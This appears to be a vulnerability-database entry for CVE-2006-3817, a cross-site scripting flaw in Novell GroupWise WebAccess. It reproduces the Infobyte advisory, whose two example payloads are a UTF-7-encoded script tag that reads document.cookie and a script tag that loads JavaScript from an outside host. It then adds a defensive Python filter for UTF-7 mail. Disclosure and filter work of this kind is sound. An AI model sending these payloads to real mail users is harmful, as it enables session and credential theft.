CVE-2006-3817
CVSS 4.3
Published: 2006-08-11 06:04:00
Last revised: 2011-03-07 21:39:32

[Original] Cross-site scripting (XSS) vulnerability in Novell GroupWise WebAccess 6.5 and 7 before 20060727 allows remote attackers to inject arbitrary web script or HTML via an encoded SCRIPT element in an e-mail message with the UTF-7 character set, as demonstrated by the "+ADw-SCRIPT+AD4-" sequence.


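[CNNVD] Novell GroupWise WebAccess and Novell GroupWise WebAccess cross-site scripting (XSS) vulnerability (CNNVD-200608-189)

        Novell GroupWise WebAccess 6.5 and Novell GroupWise WebAccess 7 versions before 20060727 contain a cross-site scripting (XSS) vulnerability. A remote attacker can inject arbitrary web script or HTML by means of an encoded SCRIPT element in an e-mail message with the UTF-7 character set, for example via the "+ADw-SCRIPT+AD4-" sequence.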

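- CVSS (base score)

CVSS score: 4.3 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: MEDIUM [exploitation requires certain access conditions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]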

- CPE (affected platforms and products)

cpe:/a:novell:groupwise_webaccess:7  Novell GroupWise WebAccess 7
cpe:/a:novell:groupwise_webaccess:6.5:sp4
cpe:/a:novell:groupwise_webaccess:6.5:sp3
cpe:/a:novell:groupwise_webaccess:6.5:sp2
cpe:/a:novell:groupwise_webaccess:6.5  Novell GroupWise WebAccess 6.5
cpe:/a:novell:groupwise_webaccess:6.5:sp1

- OVAL (technical details used for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3817
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3817
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200608-189
(Official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/28211
(PATCH)  XF  groupwise-utf7-xss(28211)
http://www.novell.com/support/search.do?cmd=displayKC&externalId=3701584&sliceId=SAL_Public
(PATCH)  CONFIRM  http://www.novell.com/support/search.do?cmd=displayKC&externalId=3701584&sliceId=SAL_Public
http://www.infobyte.com.ar/adv/ISR-14.html
(PATCH)  MISC  http://www.infobyte.com.ar/adv/ISR-14.html
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974176.htm
(PATCH)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974176.htm
http://secunia.com/advisories/21411
(VENDOR_ADVISORY)  SECUNIA  21411
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048593.html
(PATCH)  FULLDISC  20060808 [ISR] - Novell Groupwise Webaccess (Cross-Site Scripting)
http://www.vupen.com/english/advisories/2006/3098
(UNKNOWN)  VUPEN  ADV-2006-3098
http://www.securityfocus.com/bid/19297
(UNKNOWN)  BID  19297
http://www.securityfocus.com/archive/1/archive/1/442719/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060808 [ISR] - Novell Groupwise Webaccess (Cross-Site Scripting)
http://securitytracker.com/id?1016648
(UNKNOWN)  SECTRACK  1016648

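- Vulnerability information

Novell GroupWise WebAccess and Novell GroupWise WebAccess cross-site scripting (XSS) vulnerability
Medium risk  Cross-site scripting
2006-08-11 00:00:00 2006-08-14 00:00:00
Remote
        Novell GroupWise WebAccess 6.5 and Novell GroupWise WebAccess 7 versions before 20060727 contain a cross-site scripting (XSS) vulnerability. A remote attacker can inject arbitrary web script or HTML by means of an encoded SCRIPT element in an e-mail message with the UTF-7 character set, for example via the "+ADw-SCRIPT+AD4-" sequence.

- Advisories and patches


- Vulnerability information (F49122)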

ISR-novellxss.txt (PacketStormID:F49122)
2006-08-18 00:00:00
Francisco Amato  infobyte.com.ar
advisory,xss
CVE-2006-3817

Novell Groupwise WebAccess is susceptible to cross site scripting attacks. Versions 7 and 6.5 are susceptible.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

:: 
 :: [ISR]
 :: Infobyte Security Research 
 :: www.infobyte.com.ar
 :: 08.08.2006 
::


.:: SUMMARY

Novell Groupwise WebAccess Cross-Site Scripting

Version: Novell GroupWise WebAccess 7, 6.5
It is suspected that all previous versions of Groupwise WebAccess are
vulnerable.

.:: BACKGROUND

GroupWise WebAccess is Novell's premier Intranet/Internet GroupWare
solution for the Web.

More info:    http://www.novell.com

.:: DESCRIPTION

Remote exploitation of Cross-Site Scripting due to failure of the
application to properly
sanitize user-supplied input prior to including it in dynamically generated
Web content.

Example 1:
- - ---------
Description: The filter of Groupwise doesn't check UTF-7 encoding.
Sending an email with the following html code we can execute javascript
code in the context of authenticated user browser. 

<html>
<head>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</head>
+ADw-SCRIPT+AD4-alert(document.cookie);+ADw-/SCRIPT+AD4-
</html> 


Example 2:
- - ---------
Description: The filter of Groupwise doesn't sanitize the following code

<html>
<SCRIPT/XSS SRC="http://www.infobyte.com.ar/xss/xss.js"></SCRIPT>
<<SCRIPT><</SCRIPT> 
</html>

It shows simple code examples to execute script in the browser of an
unsuspecting user.
These issues may allow for the theft of authentication credentials.

.:: VENDOR RESPONSE

Vendor advisory:
   
"http://www.novell.com/support/search.do?cmd=displayKC&docType=kc&externalId=3701584&sliceId=SAL_Public&dialogID=8568328&stateId=0 0 8572233"

Vendor patch:
    Hot Patch for GroupWise 7:
http://support.novell.com/filefinder/20641/beta.html
    Field Test File for GroupWise 6.5:
http://support.novell.com/filefinder/16963/beta.html
    
.:: CVE INFORMATION

Id: CVE-2006-3817
Web: http://cve.mitre.org
    
.:: DISCLOSURE TIMELINE

05/26/2006  Initial vendor notification
05/26/2006  Initial vendor response
07/31/2005  Coordinated public disclosure

.:: CREDIT

Francisco Amato is credited with discovering this vulnerability.
famato][at][infobyte][dot][com][dot][ar

.:: ADVISORY

http://www.infobyte.com.ar/adv/ISR-14.html

.:: LEGAL NOTICES

Copyright (c) 2005 by [ISR] Infobyte Security Research.
Permission to redistribute this alert electronically is granted as long as
it is not 
edited in any way unless authorized by Infobyte Security Research Response.
Reprinting the whole or part of this alert in any medium other than
electronically 
requires permission from infobyte com ar

Disclaimer
The information in the advisory is believed to be accurate at the time of
publishing 
based on currently available information. Use of the information
constitutes acceptance 
for use in an AS IS condition. There are no warranties with regard to this
information. 
Neither the author nor the publisher accepts any liability for any direct,
indirect, or 
consequential loss or damage arising from use of, or reliance on, this
information.

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.0.6 (Build 6060)

iQA/AwUBRNjnr3s2oPjapNRZEQL2PACdG+dBRMiOzRJU+uGmd12yzBKpxo8AoL65
wNMwLcHW71e5bBcwrAvyg8Xh
=jVVp
-----END PGP SIGNATURE-----
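
Added example, not part of the advisory or of Novell's patch: a pre-filter step in Python for the UTF-7 case in Example 1, which decodes an HTML mail body the way a UTF-7-honouring browser would so that the HTML filter inspects the real markup. The function names, the charset alias list and the sample body are assumptions constructed for illustration; the sample reuses the "+ADw-SCRIPT+AD4-" sequence with a neutral payload.

```python
import re

# Assumed alias list for charset labels that mean UTF-7.
UTF7_NAMES = {"utf-7", "utf7", "unicode-1-1-utf-7", "csunicode11utf7"}
CHARSET_RE = re.compile(rb"charset\s*=\s*[\"']?\s*([\w.:-]+)", re.I)
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]", re.I)
META_RE = re.compile(r"<meta[^>]*charset[^>]*>", re.I)

# Constructed sample body modelled on Example 1.
SAMPLE = (b'<html><head>\n'
          b'<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">\n'
          b'</head>\n+ADw-SCRIPT+AD4-example()+ADw-/SCRIPT+AD4-\n</html>')


def declares_utf7(mime_charset, body):
    """True if the MIME charset or any in-body charset= token names UTF-7."""
    names = {(mime_charset or "").strip().lower()}
    names.update(m.decode("ascii").lower() for m in CHARSET_RE.findall(body))
    return bool(names & UTF7_NAMES)


def markup_hidden_by_utf7(body):
    """Count tag openings that exist only after UTF-7 decoding."""
    raw = body.decode("ascii", errors="replace")
    try:
        decoded = body.decode("utf-7")
    except UnicodeDecodeError:
        return 0  # strict decoding failed: nothing to compare
    return max(0, len(MARKUP_RE.findall(decoded)) - len(MARKUP_RE.findall(raw)))


def normalize_for_filter(mime_charset, body):
    """Return (text, flagged); text is what the HTML filter must inspect."""
    flagged = declares_utf7(mime_charset, body) or markup_hidden_by_utf7(body) > 0
    if flagged:
        text = body.decode("utf-7", errors="replace")
    else:
        try:
            text = body.decode(mime_charset or "utf-8", errors="replace")
        except LookupError:  # unknown charset label
            text = body.decode("latin-1")
    # Drop in-body charset declarations; the filtered result should be served
    # with one fixed charset so it cannot be re-interpreted.
    return META_RE.sub("", text), flagged


if __name__ == "__main__":
    text, flagged = normalize_for_filter("us-ascii", SAMPLE)
    print(flagged, markup_hidden_by_utf7(SAMPLE))
    print(text)
```

The decoded text still has to pass through the HTML filter itself; this step only ensures the filter and the browser agree on what the bytes mean.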

    

- Vulnerability information

27818
Novell GroupWise WebAccess UTF-7 Encoded Message XSS
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-07-31 2006-05-26
2006-07-31 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Novell GroupWise Multiple HTML Injection Scripting Vulnerabilities
Input Validation Error 19297
Yes No
2006-07-28 12:00:00 2006-09-05 10:43:00
Jerome Odegaard and Francisco Amato are credited with the discovery of these vulnerabilities.

- Affected program versions

Novell Groupwise 6.5.4
Novell Groupwise 6.5.3
Novell Groupwise 6.5.2
Novell Groupwise 6.5 SP6 Update 1
Novell Groupwise 6.5 SP6
Novell Groupwise 6.5 SP5
Novell Groupwise 6.5 SP4
Novell Groupwise 6.5 SP3
Novell Groupwise 6.5 SP2
Novell Groupwise 6.5 SP1
Novell Groupwise 6.5
Novell Groupwise 6.0 SP4
Novell Groupwise 6.0 SP3
Novell Groupwise 6.0 SP2
Novell Groupwise 6.0 SP1
Novell Groupwise 6.0
Novell Groupwise 6.5 Post SP6

- Unaffected program versions

Novell Groupwise 6.5 Post SP6

- Vulnerability discussion

Novell GroupWise is prone to multiple HTML-injection vulnerabilities.

These issues occur because the application fails to sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

- Exploit

Attackers can exploit this issue via a web client.

- Solution

The vendor has released updates to address these issues. Please see the references for more information.

- Related references

 

 
